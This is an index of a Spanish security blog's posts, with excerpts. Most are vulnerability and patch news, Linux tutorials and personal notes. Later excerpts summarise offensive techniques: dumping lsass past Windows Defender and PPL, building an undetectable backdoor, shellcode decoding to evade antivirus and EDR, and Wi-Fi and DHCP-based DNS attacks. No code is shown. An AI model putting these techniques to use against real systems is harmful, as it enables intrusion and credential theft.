# Republik EC > Seguridad digital ## Posts - [Desbordamiento de búfer en ActiveX de HP Operations Manager](https://www.republik.ec/desbordamiento-de-bufer-en-activex-de-hp-operations-manager/): Se ha confirmado la existencia de una vulnerabilidad en HP Operations Manager para Windows, que un atacante remoto podría emplear para comprometer los sistemas vulnerables. El software HP Operations Manager es la solución en el mercado de HP para la gestión de eventos distribuidos, sistemas y disponibilidad El problema reside en desbordamientos de búfer en […] - [Estrenando nuevo Header](https://www.republik.ec/estrenando-nuevo-header/): Gracias a mi amigo Jorge Oviedo diseñador grafico, tengo nuevo header que por cierto me parecio muy gracioso la mezcla de la palabra bendita tecnologia con una luz celestial y un robot en realidad me gusta el diseño del header y mas aun que fue gratis lol jajajaa. - [El filtro XSS de Internet Explorer 8 sigue siendo vulnerable](https://www.republik.ec/el-filtro-xss-de-internet-explorer-8-sigue-siendo-vulnerable/): Los investigadores Eduardo Vela y David Lindsay han presentado, en el marco de la conferencia Black Hat Europa de este año, un nuevo método para ejecutar ataques de cross-site scripting a través de los filtros XSS de Internet Explorer 8. Microsoft introdujo un mecanismo para filtrar ataques de cross-site scripting, concretamente los de “tipo 1” […] - [Actualizaciones de seguridad para Debian Linux](https://www.republik.ec/actualizaciones-de-seguridad-para-debian-linux/): Debian ha publicado actualizaciones de seguridad para paquetes de sus distribuciones estable “lenny” e inestable “sid”. A continuación detallamos los paquetes afectados y errores corregidos en cada uno de ellos. * phpMyAdmin: Corrige tres fallos correspondientes a los CVE-2008-7251, CVE-2008-7252 y CVE-2009-4605. El primero es un fallo en “libraries/File.class.php” al efectuar una asignación incorrecta de […] - [Oracle publica una nueva actualización de seguridad para Java](https://www.republik.ec/oracle-publica-una-nueva-actualizacion-de-seguridad-para-java/): Fuera de ciclo y en poco más de 15 días tras liberar una actualización múltiple de seguridad para Java, Oracle se ha visto obligada a lanzar una nueva actualización de seguridad para corregir dos vulnerabilidades que podrían permitir a un atacante remoto ejecutar código arbitrario. El 10 de abril contábamos en “una-al-día” el fallo descubierto, […] - [Actualización de seguridad para Adobe Reader y Acrobat](https://www.republik.ec/actualizacion-de-seguridad-para-adobe-reader-y-acrobat/): Tal y como anunciamos anteriormente Adobe ha publicado una actualización para corregir 15 vulnerabilidades en Adobe Reader y Acrobat en diferentes plataformas, que podrían permitir a un atacante tomar el control de los sistemas afectados. Las versiones afectadas son Adobe Reader 9.3.1 (y anteriores) para Windows, Macintosh y UNIX; Adobe Acrobat 9.3.1 (y anteriores) para […] - [Elevación de privilegios en IBM Systems Director](https://www.republik.ec/elevacion-de-privilegios-en-ibm-systems-director/): Se ha confirmado la existencia de una vulnerabilidad en IBM Systems Director 6.1.2 que podría permitir a un usuario local elevar sus privilegios en los sistemas afectados. IBM Systems Director es una herramienta que permite administrar y controlar servidores físicos y virtuales. El problema reside en la incorrecta asignación de permisos de archivo para determinados […] - [0-day: Inyección arbitraria de parámetros a través de Java Deployment Toolkit](https://www.republik.ec/0-day-inyeccion-arbitraria-de-parametros-a-traves-de-java-deployment-toolkit/): Tavis Ormandy, reputado investigador y empleado de Google, ha publicado un aviso de seguridad en la lista de Full Disclosure donde describe un método para inyectar parámetros arbitrarios a través de Java Deployment Toolkit. Se trata de un 0-day que podría permitir a un atacante remoto ejecutar una aplicación java arbitraria, desde una ubicación controlada […] - [Oracle publico 47 parches de seguridad el martes](https://www.republik.ec/oracle-publico-47-parches-de-seguridad-el-martes/): Siguiendo con el calendario trimestral de publicación de actualizaciones de seguridad, Oracle publicará el próximo martes 13 de abril un grupo de parches que corrigen un total de 47 vulnerabilidades. Se trata así de un día crítico para muchos administradores ya que coincide con la publicación de 11 boletines de seguridad de Microsoft. En esta […] - [Microsoft publicará 11 boletines el próximo martes](https://www.republik.ec/microsoft-publicara-11-boletines-el-proximo-martes/): En su ciclo habitual de actualizaciones los segundos martes de cada mes, Microsoft ha anunciado que en esta ocasión se esperan 11 boletines de seguridad. Afectan a toda la gama del operativo Windows, Office y Exchange. Pueden contener un número indeterminado de vulnerabilidades, aunque está programado corregir 25 vulnerabilidades (cinco de ellas reportadas por Hispasec) […] - [Vulnerabilidad en IBM WebSphere Portal](https://www.republik.ec/vulnerabilidad-en-ibm-websphere-portal/): IBM ha anunciado la existencia de una vulnerabilidad en IBM WebSphere Portal versiones 6.1.0.2 y anteriores. IBM WebSphere Portal ofrece una aplicación compuesta o infraestructura de “mashup” empresarial y las herramientas para crear soluciones basadas en SOA (Arquitectura Orientada a Servicios). WebSphere Portal contiene una amplia variedad de tecnologías destinadas a desarrollar y mantener portales […] - [Denegación de servicio en kadmind de MIT Kerberos](https://www.republik.ec/denegacion-de-servicio-en-kadmind-de-mit-kerberos/): Se ha anunciado una vulnerabilidad remota de denegación de servicio en el demonio de administración de MIT Kerberos (kadmind) versiones krb5-1.5 hasta krb5-1.6.3. El problema reside en versiones antiguas de MIT Kerberos krb5 (krb5-1.5 a la krb5-1.6.3) debido a la referencia a memoria liberada. Un usuario remoto y autenticado puede explotar este problema mediante el […] - [Apple AirPort Utility MAC Address ACLs Bypass Weakness](https://www.republik.ec/apple-airport-utility-mac-address-acls-bypass-weakness/): Se ha anunciado una vulnerabilidad en Apple AirPort Utility con versiones anteriores a 5.5.1, que un atacante podría emplearla para evitar restricciones de seguridad. El problema reside en un error en listas de control de acceso (ACLs) con direcciones MAC debido a que no se propagan de forma adecuada a los extensores de red. Usuarios […] - [Mozilla corrige la vulnerabilidad para Firefox presentada en el Pwm2Own 2010](https://www.republik.ec/mozilla-corrige-la-vulnerabilidad-para-firefox-presentada-en-el-pwm2own-2010/): Mozilla ha publicado una actualización de seguridad para el navegador Firefox que corrige una vulnerabilidad que podría permitir a un atacante remoto ejecutar código arbitrario. La vulnerabilidad se publicó en el Pwm2Own, un concurso dentro del contexto de la conferencia de seguridad CanSecWest, donde se compite por ser el primero en explotar los principales navegadores […] - [Actualización de seguridad para Foxit Reader](https://www.republik.ec/actualizacion-de-seguridad-para-foxit-reader/): Foxit ha publicado la versión 3.2.1 de su lector de documentos PDF. Esta versión corrige un fallo de diseño que podría permitir a un atacante incrustar un archivo binario en un documento PDF y proceder a su ejecución una vez abierto el documento por el usuario. Foxit Reader es un lector PDF alternativo al extendido […] - [Apple publica actualización para corregir 88 vulnerabilidades](https://www.republik.ec/apple-publica-actualizacion-para-corregir-88-vulnerabilidades/): Apple ha lanzado recientemente una nueva actualización de seguridad para su sistema operativo Mac OS X versiones 10.5 y 10.6 que solventa 88 vulnerabilidades que podrían ser aprovechadas por un atacante local o remoto con múltiples efectos. Esta es la segunda gran actualización del año (con el código 2010-002). Los componentes y software afectados son: […] - [Actualización para Java incluye 27 parches de seguridad](https://www.republik.ec/actualizacion-para-java-incluye-27-parches-de-seguridad/): Oracle, propietaria de los productos de Sun tras su compra, ha publicado una actualización de la plataforma Java SE (Standard Edition) que incluye 27 parches de seguridad. Todas las vulnerabilidades son explotables en remoto y sin necesidad de autenticación. 23 de ellas podrían afectar a la integridad, confidencialidad y disponibilidad. Dos de las vulnerabilidades han […] - [Actualización de curl/libcurl para Debian Linux](https://www.republik.ec/actualizacion-de-curl-libcurl-para-debian-linux/): Debian ha publicado una actualización de curl y libcurl que corrige una vulnerabilidad que podría permitir a un atacante remoto causar una denegación de servicio y potencialmente ejecutar código arbitrario dependiendo del contexto. curl es una aplicación de línea de comandos para transferencia de datos con sintaxis URL y con soporte para múltiples protocolos de […] - [Vulnerabilidad de ejecución de comandos en SAP GUI](https://www.republik.ec/vulnerabilidad-de-ejecucion-de-comandos-en-sap-gui/): Se ha anunciado una vulnerabilidad en SAP GUI (versión 7) que podría permitir a un atacante remoto comprometer los los sistemas afectados. El problema reside en un error de diseño en el control ActiveX “SAPBExCommonResources” que incluye el método inseguro “Execute()”. Un atacante remoto podría emplear esta vulnerabilidad para lograr la ejecución de comandos arbitrarios […] - [Vulnerabilidades en impresoras Lexmark](https://www.republik.ec/vulnerabilidades-en-impresoras-lexmark/): Lexmark ha anunciado dos vulnerabilidades que afectan a más de 60 modelos diferentes y que podrían ser empleadas por un usuario de la red para provocar denegaciones de servicio o incluso comprometer los dispositivos afectados. El problema de mayor gravedad sólo afecta a las impresoras láser, y se refiere a un desbordamiento de búfer en […] - [Denegación de servicio en OpenSSL](https://www.republik.ec/denegacion-de-servicio-en-openssl/): Se ha publicado una actualización de OpenSSL que corrige una vulnerabilidad que podría ser aprovechada por un atacante remoto para causar una denegación de servicio. La vulnerabilidad, a la cual se le ha asignado el CVE-2010-0740 y ha sido bautizada con el reminiscente nombre de “Record of Death”, fue descubierta y corregida por Bodo Moeller […] - [Cisco publica sus actualizaciones de marzo para IOS](https://www.republik.ec/cisco-publica-sus-actualizaciones-de-marzo-para-ios/): Cisco ha publicado, como cuarto miércoles de marzo, siete boletines de seguridad que solucionan múltiples vulnerabilidades en su sistema operativo Cisco IOS, que podrían ser aprovechadas por un atacante para causar denegaciones de servicio e incluso llegar a ejecutar código arbitrario. De forma breve, las vulnerabilidades corregidas son: * Los dispositivos con software Cisco IOS […] - [La versión 3.6.2 de Firefox soluciona el 0 day que se conoció hace un mes](https://www.republik.ec/la-version-3-6-2-de-firefox-soluciona-el-0-day-que-se-conocio-hace-un-mes/): Mozilla por fin ha publicado oficialmente la versión 3.6.2 del navegador Firefox que soluciona (entre otros) un fallo de seguridad que estaba siendo aprovechado por atacantes y del que se rumoreaba desde hace un mes. Por su parte (en su dinámica habitual) el gobierno alemán recomendó no usar el navegador hasta que el fallo fuese […] - [Vulnerabilidad en Servidor http de IBM OS/400](https://www.republik.ec/vulnerabilidad-en-servidor-http-de-ibm-os-400/): IBM ha reconocido la existencia de una vulnerabilidad en OS/400, que podría ser empleada por usuarios maliciosos para conseguir acceso a información sensible. El problema reside en el servidor http por un error en el tratamiento de cabeceras al procesar determinadas peticiones. Mediante peticiones específicamente creadas un atacante remoto podría emplear este problema para acceder […] - [Actualización del kernel para OpenSuSE](https://www.republik.ec/actualizacion-del-kernel-para-opensuse/): OpenSuSE ha publicado una actualización para el kernel de OpenSuSE Linux 11.2 que corrige diversos problemas de seguridad que podrían permitir la realización de ataques de denegación de servicio. Los problemas corregidos tienen relación con el manejo de ciertas operaciones de desbloqueo de “Priority Inheritance” (PI); con el tratamiento de determinados conteos de referencias en […] - [Diversas vulnerabilidades en CA ARCserve Backup](https://www.republik.ec/diversas-vulnerabilidades-en-ca-arcserve-backup/): Se han descubierto varias vulnerabilidades en CA ARCserve Backup que podrían permitir a un atacante remoto causar denegaciones de servicio, evitar restricciones de seguridad o lograr ejecutar código arbitrario. CA ARCserve Backup es una suite de gestión de almacenamiento y recuperación de datos muy usada en el mundo empresarial. Soporta las diferentes plataformas integradas en […] - [20 maneras de ejecutar código en un Mac (a través de Preview)](https://www.republik.ec/20-maneras-de-ejecutar-codigo-en-un-mac-a-traves-de-preview/): Charlie Miller no es ningún charlatán. Ya en 2007 encontró cómo ejecutar código en un iPhone simplemente visitando una web con Safari. También es responsable del fallo que permitía ejecutar código en iPhone a través de SMS, además de destapar muchos otros fallos de seguridad en Mac. A final de mes revelará 20 formas distintas […] - [Múltiples vulnerabilidades en Google Chrome](https://www.republik.ec/multiples-vulnerabilidades-en-google-chrome/): Se han anunciado un total de nueve vulnerabilidades en Google Chrome, el navegador de Google. Un atacante remoto podría emplear estos problemas para evitar restricciones de seguridad, descubrir información sensible o comprometer un sistema vulnerable. El primer problema se debe a errores de punteros en la sandbox mientras que otro problema se debe a metadatos […] - [Actualización del kernel para Red Hat Enterprise Linux 4](https://www.republik.ec/actualizacion-del-kernel-para-red-hat-enterprise-linux-4/): Red Hat ha publicado una actualización del kernel de Red Hat Enterprise Linux 4 que solventa cinco vulnerabilidades que podrían ser aprovechadas por un atacante para provocar denegaciones de servicio, revelar información sensible o evitar determinadas protecciones de seguridad. Los problemas corregidos se deben a faltas de comprobación durante el volcado de memoria, un error […] - [Ejecución de código arbitrario en SAP MaxDB](https://www.republik.ec/ejecucion-de-codigo-arbitrario-en-sap-maxdb/): Se ha publicado una vulnerabilidad en MaxDB que podría permitir a un atacante remoto, sin necesidad de autenticación, ejecutar código arbitrario a través de paquetes TCP especialmente manipulados. MaxDB es un sistema de bases de datos relacional del fabricante alemán SAP disponible para sistemas operativos Windows, Linux y Unix y con bindings para multitud de […] - [Vulnerabilidad a través de mod_isapi en IBM HTTP Server](https://www.republik.ec/vulnerabilidad-a-traves-de-mod_isapi-en-ibm-http-server/): Se ha descubierto una vulnerabilidad en IBM HTTP Server 6.0 o 6.1 en sistemas Windows que podría ser aprovechada por un atacante para causar una denegación de servicio o comprometer los sistemas afectados.  El problema afecta a los sistemas que carguen la directiva LoadModule para el módulo “mod_isapi” (por que hayan quitado el comentario de dicha directiva en el […] - [Actualización para corregir diversas vulnerabilidades en Microsoft Excel](https://www.republik.ec/actualizacion-para-corregir-diversas-vulnerabilidades-en-microsoft-excel/): Dentro del conjunto de boletines de seguridad de marzo publicado el pasado martes por Microsoft y del que ya efectuamos un resumen, se cuenta el anuncio (en el boletín MS10-017) de una actualización importante para evitar siete vulnerabilidades en Microsoft Excel que podrían permitir a un atacante remoto ejecutar código arbitrario si un usuario abre […] - [Actualización de seguridad de Apple Safari](https://www.republik.ec/actualizacion-de-seguridad-de-apple-safari/): Apple ha publicado una actualización de seguridad para su navegador Safari (versión 4.0.5) que solventa diversas vulnerabilidades que podrían ser aprovechadas por un atacante remoto para conseguir información sensible, evitar restricciones de seguridad o ejecutar código arbitrario. Safari es un popular navegador web desarrollado por Apple, incluido en las sucesivas versiones de Mac OS X […] - [Vulnerabilidad de acceso a información sensible en Skype](https://www.republik.ec/vulnerabilidad-de-acceso-a-informacion-sensible-en-skype/): Se ha dado a conocer una vulnerabilidad en Skype (en todas las versiones previas a la 4.2.0.1.55 (v4.2 hotfix #1) para Windows), que podría ser aprovechada por un atacante para evitar restricciones de seguridad y descubrir información sensible. Skype es un el cliente de VoIP (voz sobre IP) muy popular, tiene millones de usuarios por […] - [Nuevo 0-day en Microsoft Internet Explorer](https://www.republik.ec/nuevo-0-day-en-microsoft-internet-explorer/): Microsoft informa de una vulnerabilidad en el navegador Internet Explorer que podría permitir a un atacante remoto ejecutar código arbitrario, con los permisos del usuario, a través de un sitio web especialmente manipulado. La vulnerabilidad, a la que se le ha asignado el CVE-2010-0806, se encuentra en “iepeers.dll” y está causada por un puntero inválido […] - [Actualización del kernel para OpenSuSE Linux 11](https://www.republik.ec/actualizacion-del-kernel-para-opensuse-linux-11/): OpenSuSE ha publicado una actualización para el kernel de OpenSuSE Linux 11 que corrige diversos problemas de seguridad. Los problemas corregidos tienen relación con el subsistema hfs, el intérprete ELF, las operaciones de desbloqueo de prioridad de herencia y errores en “drivers/connector/connector.c” y “mm/migrate.c”. Se recomienda actualizar a través de las herramientas automáticas YoU (Yast […] - [Una vez más, malware en aplicaciones legítimas](https://www.republik.ec/una-vez-mas-malware-en-aplicaciones-legitimas/): No es la primera vez que ocurre, y por desgracia tampoco será la última. A través de una-al-día ya hemos informado en más de una ocasión sobre malware distribuidos es aplicaciones legalmente adquiridas; en esta ocasión y de forma casi simultanea se ha anunciado que Vodafone y Energizer han distribuido productos que incluían algo más […] - [Vulnerabilidad en kit de desarrollo Autonomy KeyView afecta a diversos fabricantes](https://www.republik.ec/vulnerabilidad-en-kit-de-desarrollo-autonomy-keyview-afecta-a-diversos-fabricantes/): Se ha confirmado la existencia de de una vulnerabilidad en el kit de desarrollo Autonomy KeyView que afecta a diversos fabricantes como Symantec o IBM.  Autonomy KeyView es un kit de desarrollo comercial que proporciona librerías para el tratamiento de múltiples formatos de archivos, soporta un gran número de documentos en diferentes formatos y muchos fabricantes hacen uso de esta […] - [Nuevo "0day" con ejecución de código arbitrario en Internet Explorer](https://www.republik.ec/nuevo-0day-con-ejecucion-de-codigo-arbitrario-en-internet-explorer/): Microsoft ha comunicado, a través del blog del equipo del centro de respuesta de seguridad, de una vulnerabilidad en Internet Explorer que podría permitir la ejecución de código arbitrario visitando una página web especialmente manipulada. Es necesario además para completar el ataque, que el atacante incite a la víctima a pulsar el botón F1 para […] - [Ejecución arbitraria de código en IBM Lotus iNotes](https://www.republik.ec/ejecucion-arbitraria-de-codigo-en-ibm-lotus-inotes/): Se ha confirmado la existencia de de una vulnerabilidad en IBM Lotus iNotes (Lotus Domino Web Access), por la que un atacante remoto podría comprometer los sistemas afectados.El problema reside en desbordamientos de búfer en controles ActiveX, que podrían ser explotados por un atacante remoto a través de una página HTML especialmente creada. Si el […] - [Nueva versión de PHP soluciona varios fallos de seguridad](https://www.republik.ec/nueva-version-de-php-soluciona-varios-fallos-de-seguridad/): Se ha publicado recientemente una nueva versión de PHP (versión 5.2.13) que ha solucionado dos fallos de seguridad.PHP es un lenguaje interpretado de propósito general ampliamente usado, que está diseñado para desarrollo web y puede ser embebido dentro de código HTML. PHP está orientado a la creación de páginas web dinámicas, ejecutándose en un servidor […] - [Vulnerabilidad de ejecución de código en Google Picasa](https://www.republik.ec/vulnerabilidad-de-ejecucion-de-codigo-en-google-picasa/): Se ha descubierto una vulnerabilidad en Google Picasa por la que un usuario remoto podría lograr la ejecución de código en el sistema de los usuarios.Picasa es un software de tratamiento y gestión de fotografías de Google, con el que se puede organizar, editar e imprimir las fotos del ordenador.El problema consiste en que un […] - [Actualización del kernel para Debian Linux 4.x](https://www.republik.ec/actualizacion-del-kernel-para-debian-linux-4-x/): Actualización del kernel para Debian Linux 4.x———————————————- Debian ha publicado una actualización del kernel 2.6 que corrige untotal de diez fallos de seguridad que podrían causar denegaciones deservicio o elevación de privilegios en los sistemas afectados. Esta actualización del kernel el final planeado de actualizaciones deseguridad para el kernel 2.6.18 en la versión “etch” de […] - [](https://www.republik.ec/1457-2/): Vulnerabilidad en Adobe Download Manager—————————————-Se ha anunciado una vulnerabilidad en Adobe Download Manager (anterior al 23 de febrero de 2010) que podría ser empleada por atacantes remotos para lograr el compromiso de los sistemas afectados. El fallo en realidad, se encuentra en su componente NOS, creado por otro fabricante. El fallo está en getPlus Download […] - [](https://www.republik.ec/1458-2/): Cross-Site Scripting en IBM WebSphere Portal——————————————–Se ha encontrado una vulnerabilidad en IBM WebSphere Portal (versiones 6.0J, 6.0.1.5) que podría ser explotada por un atacante remoto para realizar ataques de cross-site scripting. IBM WebSphere Portal ofrece una aplicación compuesta o infraestructura de “mashup” empresarial y las herramientas para crear soluciones basadas en SOA (Arquitectura Orientada a […] - [echo FELIZ AÑO NUEVO 2010](https://www.republik.ec/echo-feliz-ano-nuevo-2010/): Bueno como era de esperarse estoy publicando mis deseos para todos ustedes que pasen este año nuevo con los seres que mas quieren, deseandoles que este año sea de bendiciones y se cumplan sus mas grandes deseos, consigan un empleo y sigan bien en su vida social y sentimental y si este año 2009 les […] - [](https://www.republik.ec/1460-2/): Patea a carlos por no llevarle la comida a mi mami - [](https://www.republik.ec/1461-2/) - [print "FELIZ NAVIDADn";](https://www.republik.ec/print-feliz-navidadn/): Bueno no todo es temas de tecnologia y demas, para aquellos creyentes de la navidad, les deseo una feliz navidad y un prospero año nuevo, disfruten concientemente y sean felices donde vayan son los mejores de deseos. BENDITA TECNOLOGIA - [Instalando apache mysql y php5 en UBUNTU](https://www.republik.ec/instalando-apache-mysql-y-php5-en-ubuntu/): Bueno una vez mas aca dando una forma de como pueden hacer esto o aquello esta vez “INSTALAR APACHE MYSQL Y PHP5 EN UBUNTU DESDE CERO”.Pues bien anteriormente para instalar apache, mysql y php, debias de compilarlos y hacer muchas maravillas para poder instalarlos a tu linux, algo que era muy emocionante porque insultabas a […] - [EH REGRESADO!!!](https://www.republik.ec/eh-regresado-2/): Pues bien muchos dijeron este blog fue de hola y chao asi como vanilla ice, pues NO, estan muy equivocados el motivo de dejar de publicar fue por trabajo, por secuestro express, bueno el secuestro no tiene nada que ver pero igual lo pongo jaaa, y enfermedad, eh regresado con mas animos de postear los […] - [añadir acción al menú contextual de nautilus para subir un fichero a tu móvil](https://www.republik.ec/anadir-accion-al-menu-contextual-de-nautilus-para-subir-un-fichero-a-tu-movil/): Cansado de la misma rutina diaria hace unos días descubrí el paquete nautilus-actions, mediante el cual podemos añadir elementos personalizados al menú contextual de Nautilus, el gestor de ficheros de Gnome. Y esto me es muy útil, porque ya estaba cansado de tener que utilizar la opción “Enviar a…” del menú contextual, para luego seleccionar […] - [Se vino lo interesante, PROGRAMACION BASH](https://www.republik.ec/se-vino-lo-interesante-programacion-bash/): Hola otra vez aca me tienen con una nueva entrada para este blog, pues bien en este dia de enfermedad que mejor en utilizar el tiempo en algo de provecho asi que decidi hacerles este pequeño tutorial de bash, si bash NO BATCH, suenan casi iguales? YES SIR!!!! pues ambos son lenguajes de consola uno […] - [HOUSTON HOUSTON tenemos GMAIL!!!!!](https://www.republik.ec/houston-houston-tenemos-gmail/): Bueno como era de esperarse nuestro querido amigo GOOGLE siempre nos da las cosas completas o eso dicen =P tenemos correo del blog propiamente si estamos con blogger estamos con gmail tambien, aca les dejo el correo para sugerencias de nuevos temas, felicitaciones, insultos en el caso de que crean que el blog apesta. Bueno […] - [Eh por fin instale linux, ahora que? SOY UN HACKER?](https://www.republik.ec/eh-por-fin-instale-linux-ahora-que-soy-un-hacker/): Bueno para muchos fue una tarea difícil el instalar el sistema operativo linux ubuntu que al instalarlo se sintieron una especie de Dios informatico, un hacker, para otros una tarea muy sencilla, en fin felicitaciones a todos al lograr instalar.Muchos diran aqui se acabo todo? pues no!!!! recien empieza lo mejor, aprenderemos a utilizar linux […] - [Introduccion a Linux](https://www.republik.ec/introduccion-a-linux/): Linux ha tenido siempre la mala fama de difícil, de sistema operativo para expertos ,hackers para geeks que si lo tocas podrias generar la 3era guerra mundial, y de ser complicado para administrar para usuarios promedio. En sus comienzos esto era aún peor, ya que para casi todo el mundo Linux era solo ser utilizado […] - [Linux mis primeros pasos](https://www.republik.ec/linux-mis-primeros-pasos/): Bueno como habia dicho anteriormente hablaremos de sistemas operativos y demas, hoy es el turno de linux y como siempre todo tiene sus inicios, hoy empezaremos con nuestros primeros pasos de una manera sencilla entendible para aquellos usuarios que solo saben de linux por el pequeño pinguino que lo representa. Hoy dedicaremos el tema a […] - [Bienvenidos a BenditaTecnologia](https://www.republik.ec/bienvenidos-a-benditatecnologia/): Les doy la bienvenida a este sencillo pero util blog donde podran encontrar solucion a problemas informaticos de la vida diaria, lo cual incluye programacion, sistemas operativos, configuracion de servidores (web, ftp, smtp, pop3, telefonia y mas). BenditaTecnologia esta orientado a usuarios novatos y expertos con tutoriales y videotutoriales incluidos por mi o por terceras […] - [Análisis de CrowdStrike, el pequeño caos actual.](https://www.republik.ec/analisis-de-crowdstrike-el-pequeno-caos-actual/): Examinando un problema de memoria en C++ Durante un análisis de Crowdstrike, se descubrió un problema con un puntero NULO (NULL) en el código C++, lo que reveló posibles vulnerabilidades. - [Bypassing windows defender y ppl protection con pplblade para volcar lsass sin detección](https://www.republik.ec/bypassing-windows-defender-y-ppl-protection-con-pplblade-para-volcar-lsass-sin-deteccion/): Al ser un operador de seguridad ofensivo, es crucial evadir las medidas de protección implementadas en los sistemas Windows y - [¿Cómo configurar Flipper Zero para ataques Wi-Fi?](https://www.republik.ec/como-configurar-flipper-zero-para-ataques-wi-fi/): Antes de comenzar recuerda que realizar cualquiera de los ataques explicados en este post a redes sin consentimiento previo es ilegal, la información de este post es solo para fines educativos. - [Backdoor windows, ¿Qué son y cómo crear uno que sea indetectable?](https://www.republik.ec/backdoor-windows-que-son-y-como-crear-uno-que-sea-indetectable/):   ¿Qué es un backdoor o puerta trasera? Un backdoor o puerta trasera por su traducción al español, es un método para obtener acceso remoto en secreto a una computadora al pasar por alto la autenticación normal y el firewall de la máquina o corporativo. No confundir con un troyano, si bien es cierto los troyanos incluyen puertas traseras pero no, no son lo mismo. En este post, escribiré sobre ‘Cómo creé una puerta trasera para mi máquina con Windows que ni siquiera el antivirus pudo detectar’. Después de crear la puerta trasera, pude hacer muchas cosas en la máquina […] - [100 millones de teléfonos Samsung afectados con función defectuosa de clave de cifrado por hardware](https://www.republik.ec/100-millones-de-telefonos-samsung-afectados-con-funcion-defectuosa-de-clave-de-cifrado-por-hardware/):   Un grupo de académicos de la Universidad de Tel Aviv ha revelado detalles de fallas de diseño “graves” ahora reparadas que afectan a unos 100 millones de teléfonos inteligentes Samsung basados en Android que podrían haber resultado en la extracción de claves criptográficas secretas. Las deficiencias son el resultado de un análisis del diseño criptográfico y la implementación de Keystore respaldado por hardware de Android en los dispositivos insignia de Samsung los Galaxy S8, S9, S10, S20 y S21, dijeron los investigadores Alon Shakevsky, Eyal Ronen y Avishai Wool . Los entornos de ejecución de confianza ( TEE ) son una zona segura […] - [Forma de mitigar los ataques de Phishing](https://www.republik.ec/forma-de-mitigar-los-ataques-de-phishing/): Hace mucho tiempo se me había pedido que haga una guia de como mitigar un ataque phishing, dejenme decirles que nunca es tarde para ello, aquí les traigo este post que espero sea de utilidad para algunos. Antes de comenzar debemos saber ¿Qué es el phishing? ¿Alguna vez has recibido un correo que te dice que hagas clic en un enlace y pongas tu información urgente? Esto podría ser un ataque de phishing. El phishing es básicamente un esquema utilizado por la mayoría de los estafadores para obtener su información a través de Internet. Este artículo analiza las formas de mitigar los […] - [Ransomware BlackByte vulneró la seguridad crítica en EEUU](https://www.republik.ec/ransomware-blackbyte-vulnero-la-seguridad-critica-en-eeuu/):   Las amenazas de ransomware han ido en aumento con la actualización de varias tecnologías. Muchos grupos de hackers han estado proporcionando servicios de ransomware basados en RaaS a los ciberdelincuentes. La oficina federal de investigaciones (FBI) y el Servicio Secreto de EE. UU. (USSS) publicaron que, a partir de noviembre de 2021, BlackByte Ransomware ha comprometido a varias entidades en los sectores de infraestructura crítica de EE. UU., incluidas las instalaciones gubernamentales, financieras, alimentarias y agrícolas. BlackByte es un grupo de ransomware basado en RaaS (Ransomware as a Service) que tiene como objetivo el cifrado de archivos en sistemas host de Windows […] - [Nuevo 0day en Google Chrome ataque altamente peligroso - ¡Actualice de inmediato!](https://www.republik.ec/nuevo-0day-en-google-chrome-ataque-altamente-peligroso-actualice-de-inmediato/):   Google ha parcheado una vulnerabilidad de día cero (0day) en el navegador web Chrome para escritorio, lo cual dice que está siendo explotada activamente por atacantes remotos. La compañía lanzó la actualización 88.0.4324.150 para Windows, Mac y Linux, con una solución para una falla de desbordamiento del búfer de pila (heap buffer overflow flaw) (CVE-2021-21148) en su motor de renderizado V8 JavaScript. “Google está al tanto de los informes de que existe un exploit para CVE-2021-21148 en estado altamente activo”, dijo la compañía en un comunicado. Mattias Buelens informó a Google de la falla de seguridad el 24 de […] - [Un proveedor de software espía hizo un WhatsApp falso para hackear objetivos](https://www.republik.ec/un-proveedor-de-software-espia-hizo-un-whatsapp-falso-para-hackear-objetivos/): El análisis técnico de Citizen Lab y Motherboard encontró vínculos entre una versión falsa de WhatsApp y Cy4Gate, una empresa de vigilancia italiana que trabaja con policías y agencias de inteligencia (¿Hacking Team 2.0?). Los piratas informáticos intentaron engañar a los usuarios de iPhone para que instalaran una versión falsa de WhatsApp en un intento potencial de recopilar información sobre ellos. Los análisis técnicos de ambas empresas Citizen Lab y Motherboard sugieren que esta versión falsa de WhatsApp está vinculada a una empresa de vigilancia italiana específica. La noticia destaca un ataque que a veces se pasa por alto en […] - [INYECCIÓN DE REGISTROS DNS FALSOS UTILIZANDO DHCP](https://www.republik.ec/inyeccion-de-registros-dns-falsos-utilizando-dhcp/): Durante una Prueba de Penetración Interna o Simulación de Ataque Adversario (RedTeam), se desplegará un dispositivo de red falso basado en Linux en la red de un cliente. Estos dispositivos a veces obtendrán una dirección IP a través de DHCP y establecerán una conexión de salida en la que podemos realizar nuestras pruebas. Cada red de cliente es diferente, pero hemos notado que una configuración común es inyectar automáticamente un registro DNS basado en el nombre de host del host que solicitó una concesión de DHCP. Si bien la configuración más común que hemos encontrado es el servicio DHCP de […] - [Decodificación de shellcode en memoria para evadir antivirus y EDRs (Endpoint Detection & Response solution)](https://www.republik.ec/decodificacion-de-shellcode-en-memoria-para-evadir-antivirus-y-edrs-endpoint-detection-response-solution/):   Durante la semana anterior, estuve investigando un poco sobre las API de win32 y cómo podemos usarlas durante el armado de nuestro ataque, ya hice algunos trabajos relacionados con la inyección de procesos en el pasado, pero estaba buscando algo más avanzado y hacer un extra milla en proceso de inyección. Entonces, decidí usar mi código hecho en C para inyectar un shellcode en un proceso de inyección vainilla e intenté llevarla al siguiente nivel implementando una rutina de decodificación y me aseguré de que mi shellcode se escribirá en la memoria de una manera codificada y luego se […] - [Un especial Attack Surface del sistema Android (1) - Cuadro de diálogo malvado](https://www.republik.ec/un-especial-attack-surface-del-sistema-android-1-cuadro-de-dialogo-malvado/):  Introducción Una superficie de ataque (Attack Surface) de un sistema es la suma de todos los puntos en los que un usuario autorizado ingresa datos al sistema. También puede ser utilizado por un usuario no autorizado (“atacante”) para acceder al sistema. Independientemente de los campos y las direcciones profesionales, la superficie de ataque siempre se considera el núcleo del descubrimiento de vulnerabilidades. Ya sea para Web o binario, para Windows o Android, la investigación se ha centrado en cómo acceder a la superficie de ataque, analizar el código de procesamiento de datos asociado con la superficie de ataque y eliminar […] - [Ingeniería inversa a Imessage: Aprovechamiento del hardware para proteger el software](https://www.republik.ec/ingenieria-inversa-a-imessage-aprovechamiento-del-hardware-para-proteger-el-software/): iMessage es una aplicación y un protocolo de mensajería segura ampliamente utilizado en todo el ecosistema de Apple. Con curiosidad por saber cómo sería ejecutar iMessage en otras plataformas, adoptamos un enfoque de ingeniería inversa para comprender cómo funciona iMessage y examinar las posibilidades de extenderlo a otras plataformas. El objetivo de este artículo es mostrar cómo Apple aprovecha el hecho de que produce el hardware para proteger su software. Para explorar esto, intentaremos conectarnos a través de Apple Push Notification (APN) directamente en el nivel 